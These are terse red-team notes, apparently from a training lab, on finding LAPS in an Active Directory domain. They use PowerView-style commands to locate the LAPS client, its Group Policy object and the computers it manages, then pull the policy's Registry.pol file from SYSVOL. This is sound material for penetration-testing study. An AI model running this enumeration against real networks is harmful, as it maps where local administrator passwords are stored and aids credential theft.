Hunt for LAPS

ls C:\Program Files\LAPS\CSE

AdmPwd.dll

powershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

displayname              : LAPS
name                     : {2BE4337D-D231-4D23-A029-7B999885E659}

powershell Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
       
wkstn-2.dev.cyberbotic.io
web.dev.cyberbotic.io    
sql-2.dev.cyberbotic.io  
wkstn-1.dev.cyberbotic.io

ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine

920b     fil     08/16/2022 12:22:23   Registry.pol

download \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{2BE4337D-D231-4D23-A029-7B999885E659}\Machine\Registry.pol